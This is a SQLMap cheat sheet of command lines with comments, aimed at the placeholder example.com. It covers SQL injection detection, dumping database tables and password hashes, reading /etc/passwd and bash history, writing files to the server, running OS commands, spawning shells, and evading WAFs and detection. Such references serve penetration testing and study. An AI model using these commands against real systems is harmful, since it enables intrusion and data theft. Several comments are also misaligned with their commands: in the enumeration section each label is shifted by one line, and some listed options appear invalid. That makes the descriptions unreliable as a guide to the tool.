SQLMap
SQLMap is an open-source penetration testing tool used for detecting and exploiting SQL injection vulnerabilities in web applications. It's a command-line tool that automates the process of identifying SQL injection flaws and can also be used to take over database servers. Designed for both beginners and experts, SQLMap offers extensive capabilities, including database fingerprinting, data extraction, and access to underlying file systems.
Installation and Setup
From Python (Recommended)
SQL Injection Testing Commands
sqlmap -u "http://example.com?id=1" #Basic Detection sqlmap -u "http://example.com?id=1" --batch #Automated Mode (No Prompts) sqlmap -u "http://example.com?id=1&search=apple" -p id #Set a Specific Injection Parameter sqlmap -u "http://example.com?id=1&category=2" #Multiple Parameters Testing sqlmap -r request.txt #Use a Request File (Burp Suite Export) sqlmap -u "http://example.com" --level=5 --headers="User-Agent: ' OR 1=1 --" #Inject in HTTP Headers sqlmap -u "http://example.com?id=1&search=apple" --cookie="PHPSESSID=xyz123" #Inject with Session Cookies sqlmap -u "http://example.com?id=1" --method=POST --data="username=admin&password=1234" #POST Method Injection sqlmap -u "http://example.com?id=1" --headers="Content-Type: application/x-www-form-urlencoded" #Custom Content-Type Header sqlmap -u "http://example.com?id=1" --timeout=30 #Set Connection Timeout sqlmap -u "http://example.com?id=1" --time-sec=10 #Set Time-Delay for Blind SQL Injection sqlmap -u "http://example.com?id=1" --max-retries=5 #Set Maximum Retries on Failed Connections
Authentication Techniques
sqlmap -u "http://example.com" --auth-type=basic --auth-cred="admin:password" #Basic HTTP Authentication sqlmap -u "http://example.com" --auth-type=digest --auth-cred="user:password" #Digest Authentication sqlmap -u "http://example.com" --auth-type=ntlm --auth-cred="DOMAIN\user:password" #NTLM Authentication sqlmap -u "http://example.com" --cookie="PHPSESSID=xyz123" #Session Cookies sqlmap -u "http://example.com" --headers="X-Forwarded-For: 127.0.0.1, Referer: http://example.com" #Custom Header Injection sqlmap -u "http://example.com" --proxy="http://127.0.0.1:8080" --proxy-auth="user:password" #Proxy Authentication sqlmap -u "http://example.com" --tor --tor-type=SOCKS5 --check-tor #Using the Tor Network sqlmap -u "http://example.com" --auth-type=Bearer --auth-cred="Bearer <token>" #Bearer Token Authentication sqlmap -u "http://example.com" --auth-type=OAuth --auth-cred="OAuth2 <token>" #OAuth2 Authentication sqlmap -u "http://example.com" --auth-type=Custom --auth-cred="apiKey=<key>" #Custom Authentication using API Keys sqlmap -u "http://example.com" --cookie="sessionid=xyz; user=admin" --auth-type=basic --auth-cred="admin:password" #Combined Session Cookie and Basic Auth
Database Enumeration
sqlmap -u "http://example.com?id=1" --roles #List Available Databases sqlmap -u "http://example.com?id=1" --dbs #List Tables in a Specific Database sqlmap -u "http://example.com?id=1" -D database_name --tables #List Columns in a Table sqlmap -u "http://example.com?id=1" -D database_name -T table_name --columns #Dump Data from a Table sqlmap -u "http://example.com?id=1" -D database_name -T table_name --dump #Dump Data with Conditions sqlmap -u "http://example.com?id=1" -D database_name -T table_name --dump -C username,password --where="id>10" #List Database Users sqlmap -u "http://example.com?id=1" --users #Crack User Passwords sqlmap -u "http://example.com?id=1" --passwords #Get Database Roles sqlmap -u "http://example.com?id=1" --privileges -U username #Check Privileges of a User sqlmap -u "http://example.com?id=1" --search="email" #Search for Specific Data in a Table sqlmap -u "http://example.com?id=1" -D database_name -T users --dump --threads=10 #Dump Data with Multiple Threads sqlmap -u "http://example.com?id=1" --os-shell #Get an Interactive Shell After Database Enumeration sqlmap -u "http://example.com?id=1" --time-sec=5 #Delay Between Requests to Evade Detection
Injection Techniques
sqlmap -u "http://example.com?id=1" --technique=BEUST #Specify Injection Techniques (B: Boolean-based, E: Error-based, U: UNION query-based, S: Stacked queries, T: Time-based blind) sqlmap -u "http://example.com?id=1" --risk=3 --level=5 #Specify Risk and Level (Max Risk = 3, Max Level = 5) sqlmap -u "http://example.com?id=1" --fingerprint #Fingerprint Database sqlmap -u "http://example.com?id=1" --prefix="' OR " --suffix="--" #Set Payload Injection Points sqlmap -u "http://example.com?id=1" --technique=E #Use Error-based Injection Only sqlmap -u "http://example.com?id=1" --technique=U #Use UNION-based Injection Only sqlmap -u "http://example.com?id=1" --technique=ST #Use Stacked Queries Only sqlmap -u "http://example.com?id=1" --technique=BT #Use Boolean and Time-based Injection #Techniques: B: Boolean-based blind E: Error-based U: UNION query-based S: Stacked queries T: Time-based blind sqlmap -u "http://example.com?id=1" --random-agent #Randomize User-Agent sqlmap -u "http://example.com?id=1" --proxy="http://127.0.0.1:8080" #Use Proxy During Injection
File and Operating System Access
sqlmap -u "http://example.com?id=1" --file-read=/etc/passwd #Read Files from the Target Server sqlmap -u "http://example.com?id=1" --file-write=/path/to/local/file --file-dest=/path/on/server #Write Files to the Target Server sqlmap -u "http://example.com?id=1" --file-search=password #Search for Files on the Server sqlmap -u "http://example.com?id=1" --os-cmd="whoami" #Run OS Commands sqlmap -u "http://example.com?id=1" --os-shell #Get an Interactive Shell sqlmap -u "http://example.com?id=1" --os-pwn #Execute OS Privilege Escalation sqlmap -u "http://example.com?id=1" --os-exec="/bin/bash -i" #Execute Commands in a Shell sqlmap -u "http://example.com?id=1" --file-read=/home/user/.bash_history #Read Bash History File sqlmap -u "http://example.com?id=1" --os-cmd="cat /proc/version" #Fetch System Information sqlmap -u "http://example.com?id=1" --os-cmd="ps aux" #List Running Processes
Output and Logging
sqlmap -u "http://example.com?id=1" --output-dir=/path/to/output #Save Output to Directory sqlmap -u "http://example.com?id=1" --dump-format=json #Set Output Format sqlmap -u "http://example.com?id=1" -v 3 #Verbose Logging Verbose Levels: 0: Quiet (no output) 1: Basic Information 2: Progress Indicators 3: Debugging sqlmap -u "http://example.com?id=1" --batch #Run Automatically Without Prompts sqlmap -u "http://example.com?id=1" --save #Save the State of the Session for Later Resumption sqlmap -u "http://example.com?id=1" --flush-session #Flush the Current Session and Restart sqlmap -u "http://example.com?id=1" --disable-color #Disable Colored Output for Logging sqlmap -u "http://example.com?id=1" --log="output.log" #Save Detailed Logs to a File
Tampering and Bypassing WAFs
sqlmap -u "http://example.com?id=1" --tamper=space2comment #Use a Tamper Script sqlmap -u "http://example.com?id=1" --tamper=space2comment,randomcase #Combine Multiple Tamper Scripts sqlmap -u "http://example.com?id=1" --user-agent="Mozilla/5.0" #Custom User-Agent sqlmap -u "http://example.com?id=1" --random-agent #Randomize User-Agent sqlmap -u "http://example.com?id=1" --delay=2 #Throttle Requests sqlmap -u "http://example.com?id=1" --tamper=between,randomcase #Use Additional Tamper Scripts sqlmap -u "http://example.com?id=1" --referrer="http://example.com" #Custom Referrer Header sqlmap -u "http://example.com?id=1" --no-cast #Disable Auto-CAST for Payloads sqlmap -u "http://example.com?id=1" --tamper=apostrophemask #Tamper Script for Masking Apostrophes
Real-World Examples
sqlmap -u "http://example.com/login" --data="username=admin&password=1234" --dbs #Test Login Form for Injection sqlmap -u "http://example.com?id=1" --batch --dump --threads=10 #Dump All Data in the Fastest Way sqlmap -u "http://example.com?id=1" --passwords --threads=5 #Enumerate and Crack All Passwords sqlmap -u "http://example.com?id=1" --proxy="http://127.0.0.1:8080" --tamper=space2comment --random-agent #Bypass a WAF Using Proxies and Tamper Scripts sqlmap -u "http://example.com?id=1" --random-agent --delay=5 --level=1 --risk=1 #Run as Stealthily as Possible sqlmap -u "http://example.com/login" --data="username=admin&password=1234" --os-cmd="ls" #Test for OS Command Injection sqlmap -u "http://example.com?id=1" --dbs --batch --no-cast #Get Databases in One Shot with No Auto-CAST sqlmap -u "http://example.com?id=1" --flush-session --threads=10 #Use Multiple Threads and Flush Session Before Running